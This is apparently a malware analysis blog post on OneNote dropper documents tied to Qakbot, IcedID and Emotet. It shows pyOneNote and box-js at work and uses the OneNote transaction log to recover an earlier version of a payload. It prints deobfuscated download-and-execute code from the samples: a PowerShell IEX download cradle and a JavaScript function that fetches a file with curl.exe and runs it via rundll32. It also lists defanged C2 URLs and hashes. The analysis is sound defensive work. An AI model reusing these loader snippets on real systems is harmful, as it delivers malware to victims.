OneNote Analysis
11 May 2023
By Jacob Pimental
OneNote documents are the latest trend for malware because they do not require macros to run the malware and very few tools can accurately parse the file format. This trend has been seen in distribution of Qakbot and Redline Stealer. While malware laced OneNote files may seem to only benefit criminals, there are a few benefits to the unique file format from a forensics perspective as well. This article will walk through analyzing basic OneNote malware using the pyOneNote tool from DissectMalware.
Samples
MD5 | Name |
---|---|
b951629aedffbabc180ee80f9725f024 | info_9316876362.one |
eb8d50fd5a3afa04fe7fb476f2df9e99 | Inv_02_02_#2.one |
b915056524f1b25937074727cdf5f87c | file_5.hta |
c9d2355fc2be90b0fa73ecb67061a77e | file_1.hta |
- Samples
- OneNote Format
- Basic Analysis
- Advantages of the Transaction Log
- Conclusion
- IOCs
- Mitre ATT&CK IDs
OneNote Format
OneNote documents consist of sections, pages, outlines, and content, each having their own metadata and attributes. Details of the MS-ONE file format can be found in the specification documents from Microsoft. Below is a brief overview of the structure:
Structure of OneNote Document
Sections
Sections contain pages, metadata, and properties for the OneNote document. This is what gets exported as a .one
file when saving from OneNote. It contains properties such as which pages are contained within the section, the order of those pages, and the name of the section.
Pages
Pages contain the actual content of the OneNote document. This includes text, images, tables, and outlines. Some of the properties associated with a page include the author, the width and height of the page, the last modified timestamp, and if this is the first page in the section.
Outline
Outlines are a convenient way to group elements together. You can think of outlines like a mini container that stores text, images, tables, file references, etc. Outlines can be placed anywhere on a page and are even allowed to overlap with each other. Outlines have properties associated with their height, width, and their location on the page.
Content
Content is the actual text, images, tables, and data files that go into pages and outlines. Each content element has its own set of unique properties and values.
Properties and Property Sets
All content within a OneNote document contains a series of properties associated with the element. Property sets are the groups of properties that make up an element, and are often prepended with jcid
, a structure specific to OneNote documents. The property sets within a OneNote file describe the types of elements within that file and how to parse them. Properties are the individual metdata values contained within a property set.
Transaction Log
The transaction log is a special metadata object within a OneNote document that will keep track of changes. This allows the user to view previous versions of a document and see when they were edited. For an analyst, the transaction log can help find additional IOCs associated with a sample and identify previous campaigns the file might have been used in.
File Data Object
A file data object is a special element that contains a binary stream for the type of file it represents. This can be used maliciously by including malicious scripts or executables that can run when a user double-clicks on them. When a file data object is added to a OneNote document, it displays as the .ico
of the application that will run the file as shown in the screenshot below:
File data object of .hta file
Basic Analysis
Taking a look at info_9316876362.one we can verify with trid
that this is a OneNote document:
trid
identifying the file as a .one document
Because there is no OLE data like in normal Office documents, we cannot use oletools to parse this file. This is where pyOneNote comes in. pyOneNote will parse the contents of the transaction log and list the changes made in the document. The tool will also extract any embedded files and write them to the directory specified by the -o
flag. For example, in the screenshot below pyOneNote is being used to extract embedded files to the “extracted_files” directory.
Running pyOneNote on document
The output makes it clear that several files were pulled from the OneNote document. Three of these files are PNGs that look like they are used to trick a user into clicking a link. The fourth file is JavaScript whose original file path was C:\Autoruns\output1.js
. The metadata from the script tells us that the language of the script is set to Russian, and that the alt text for the image NOTE4_WHITE_1.bmp
is Russian text that translates to:
Auto-generated alt text:
Connect to the cloud
This document contains attachments from the cloud
to receive them, double click "Next"
Next
Embedded JavaScript file information showing the Russian Language ID and name of file
Information about the embedded image including the alt text and name of image file
Image embedded in OneNote Document
Looking at the list of properties found by pyOneNote, we can see a jcidEmbeddedFileNode that matches the output1.js
file. This tells us that the author of the document embedded the script to the document so that when a user clicks on it Windows will open the script in the appropriate application - wscript in this case. Thanks to the transaction log, we see the date the script was embedded: 2023-03-17 13:37:19
.
jcidEmbeddedFileNode property showing the date value
Analyzing Malicious Script
Now that we know that there is an embedded script and have it extracted with pyOneNote, we begin our analysis. To do this quickly, I am going to use a slightly modified version of box-js, a JavaScript emulator that comes with Remnux. I can launch the malicious script in the emulator using the command:
box-js extracted_files/file_3.js --download
We can see that the script attempts to reach out to multiple C2s and write what looks to be a zip file. It will then extract that file to a new folder and run the unzipped file via regsvr32.exe
.
box-js analysis results
This shows the power of emulation over having to manually analyze the file. Upon further analysis, the downloaded payload is Emotet, but that is outside the scope of this article.
Advantages of the Transaction Log
The transaction log is extremely useful when analyzing OneNote documents. It allows us to view the changes the document went through and can help us find additional IOCs associated with the sample. For example, when running Inv_02_02_#2.one
through pyOneNote you will notice that it extracts two .hta files. It’s initially unclear which one of these files will execute when the user opens the file, but with the help of the transaction log we can see if there were any changes made to these .hta files.
Using the following gawk
command on the output of pyOneNote, I was able to pull out only the jcidEmbeddedFileNode
properties and their corresponding .hta file.
gawk -v n=8 '{ if( match($0, /\s+(jcid[^\(]+)\(/, arr) ) { if( arr[1]~/jcidEmbeddedFileNode/ ) { print arr[1]; for( i=1; i<=n; i++ ) getline; print; } } }' output.txt
List of embedded filenames in the .one document
Based on the output in the screenshot above, we can see that there was a change in the embedded files from Z:\build\one\Open.hta
to C:\Users\Admin\Desktop\Open.hta
on February 3rd, 2023. We can infer that the latest version of the .hta file is the expected payload for the sample and can continue our analysis from there.
File_5.hta Analysis
The latest version of the .hta file was extracted as pyOneNote as file_5.hta
. This file contains VBScript code that will loop through each index of an array of decimal values and subtract that value from the char value of a large blob of text. The output of this is then run through the execute
function of VBScript if the folder c:usersta
does not exist. One thing to note is that c:usersta
is not a valid folder name. The author of the script most likely used that name so that the malware will always run.
First round of obfuscation in file_5.hta
The decoded output runs an encoded PowerShell command that deobfuscates to:
IEX (New-Object Net.Webclient).downloadstring("http://corsanave[.]top/gatef.php")
This will download a file at http://corsanave[.]top/gatef.php
which at the time of writing is down but was associated with IcedID according to this report from Joes Sandbox.
Encoded PowerShell run by file_5.hta
File_1.hta
After analyzing file_5.hta
, we should analyze the previous version of the .hta file to fully understand the threat and identify additional IOCs. The previous version of the file was extracted by pyOneNote as file_1.hta
. In it, we can see an entirely different version of the .hta file we looked at previously. This version is written in JavaScript as opposed to VBScript and uses a different method of obfuscation.
When first looking at the file we notice a div section defined containing an obfuscated string. We then see the content of this div being written to the registry key HKCU\SOFTWARE\Andromedia\Mp4ToAvi\Values
.
Creating div and writing content to registry key
Next, the JavaScript will take the value from that registry key, remove all occurrences of 5&
and use the decoded value to create a function. Using Cyberchef, we can see that this function will take a URL as an argument. It will then download a file from that URL using curl.exe
and output it into C:\ProgramData\index1.png
. Finally, the function will execute the downloaded file using rundll32.exe
with the function Wind
. The decoded JavaScript function is below:
function sleep(millis) {
var date = new Date();
var curDate = null;
do {
curDate = new Date();
}while(curDate - date < millis);
}
/** var url = "https://google.com"; */
new ActiveXObject("wscript.shell").run("curl.exe --output C:\\ProgramData\\index1.png --url " + url, 0);
sleep(15000);
var shell = new ActiveXObject("shell.application");
shell.shellexecute("rundll32", "C:\\ProgramData\\index1.png,Wind", "", "open", 3);
In the above snippet, we see that a comment was left in for testing the function with the URL “google.com”.
After the Wind function is created, it is run with the hard-coded parameter https://unitedmedicalspecialties[.]com/T1Gpp/OI.png
. At the time of writing, this C2 is down but is associated with Qakbot according to this report by Esentire.
Finally, the .hta file will delete the registry key it created using VBScript.
Creation of new function and grabbing payload
Conclusion
Thanks to tools like pyOneNote, analyzing OneNote documents can be done without needing the actual OneNote application installed on your machine. This is useful for those without a Microsoft-365 subscription or without access to a Windows machine. We also used the transaction log associated with OneNote documents to extract a previous version of the payload that was associated with a different campaign entirely! This leads us to believe that whoever wrote the IcedID payload might have used a copy of the Qakbot payload as a template.
Thanks for reading and happy reversing!
IOCs
Network Indicators
IOC |
---|
Sample 1 |
https://oopt[.]center:443/bitrix/HKD1OCEK4mWEc0/ |
http://aristonbentre[.]com/slideshow/O1uPzXd2YscA/ |
https://applink[.]gr/wp-admin/pWxO42PQrVL0ja5LTfhy/ |
http://attatory[.]com/i-bmail/6AfEa8G0W8NOtUh7hqFj/ |
http://asakitreks[.]com/uploads/ce8u7/ |
https://www[.]ata-sistemi[.]si/wp-admin/cVDQapxmtAQQq1gr3/ |
http://bvdkhuyentanyen[.]vn/files/TKK8yKdEvyYAbBE5avb/ |
http://bluegdps100[.]7m[.]pl/app/Ac8wwulKxqZjc/ |
https://casapollux[.]com/Bilder/GDo3zoURY/ |
Sample 2 |
http://corsanave[.]top/gatef.php |
https://unitedmedicalspecialties[.]com/T1Gpp/OI.png |
Samples
MD5 | Name |
---|---|
b951629aedffbabc180ee80f9725f024 | info_9316876362.one |
eb8d50fd5a3afa04fe7fb476f2df9e99 | Inv_02_02_#2.one |
b915056524f1b25937074727cdf5f87c | file_5.hta |
c9d2355fc2be90b0fa73ecb67061a77e | file_1.hta |
Mitre ATT&CK IDs
ID | Name |
---|---|
T1071.001 | Application Layer Protocol: Web Protocols |
T1218.010 | System Binary Proxy Execution: Regsvr32 |
T1105 | Ingress Tool Transfer |
T1059.001 | Command and Scripting Interpreter: PowerShell |
T1204.002 | User Execution: Malicious File |
T1112 | Modify Registry |
T1218.011 | System Binary Proxy Execution: Rundll32 |